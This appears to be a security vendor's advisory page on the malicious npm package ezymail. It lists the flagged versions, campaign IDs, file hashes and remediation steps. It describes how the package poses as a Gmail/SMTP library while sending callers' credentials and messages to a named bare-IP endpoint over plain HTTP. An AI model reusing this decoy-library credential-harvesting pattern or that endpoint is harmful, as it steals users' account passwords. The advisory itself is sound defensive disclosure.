Which versions of ezymail are malicious?

The following npm versions of ezymail are flagged malicious: 2.0.2, 2.0.4, 2.0.5, 2.0.6, 2.0.8, 3.0.0. Treat any of these as compromised.

How do I remediate ezymail if I installed it?

Remove ezymail from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is ezymail part of a known attack campaign?

Yes — ezymail is associated with the IN-MAL-2026-003429, IN-MAL-2026-003804, IN-MAL-2026-003391, IN-MAL-2026-003441, IN-MAL-2026-003428, IN-MAL-2026-006087 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect ezymail in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking ezymail and packages like it before any post-install script runs.

Malicious package

ezymailnpm

Malicious code in ezymail (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-4557

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall ezymail

What this malware does

The package advertises itself as a Gmail/SMTP sender library. The README documents that callers pass their SMTP user and pass (Gmail App Password) to a send() function that talks SMTP/TLS directly to the user's mail server. In reality, index.js (the package main) does not use the bundled lib/mailer.js SMTP implementation at all. Instead, send() spreads the caller-supplied data (including user, pass, from, to, subject, and body) into a JSON payload and POSTs it to http://54.90.254.81:3000/send over cleartext HTTP (index.js lines 7-22). lib/mailer.js exists as decoy code matching the README's 'How It Works' section but is only imported by server.js, the attacker's relay server, never by the package main. Every consumer following the documented usage hands their Gmail address and App Password — plus all recipient addresses and message content — to a bare-IP endpoint over plaintext HTTP on first call to the package's advertised API.

Malicious versions

6 flagged

2.0.22.0.42.0.52.0.62.0.83.0.0

Indicators of compromise (SHA-256)

68368df4bdb4b3db2be822a508ff596ca7af0f74c0cbf9e8137426a66933900e

73ac73ac3571e19c5124da7423f66b9de2d99956ea07518b430d0a6393716424

a10e677af3dda40bc569ecdac08d36a73fc29fbdf1ba170538076a83cbab263e

daae0def10869ec69e0029757598c30dd99b3f27a2e38b5e84fc356a55de8dd8

ea463f516048086ec4acfc2733edc9561dac749d19c2e47381fc170c451cd53c

ad9bcfcddac468f20e74e2cdc0c5dca674ae1462ac42f5efca18766fa333d224

Frequently asked questions

No. ezymail on npm has been identified as a malicious package (versions 2.0.2, 2.0.4, 2.0.5, 2.0.6, 2.0.8, 3.0.0 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-003429IN-MAL-2026-003804IN-MAL-2026-003391IN-MAL-2026-003441IN-MAL-2026-003428IN-MAL-2026-006087

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection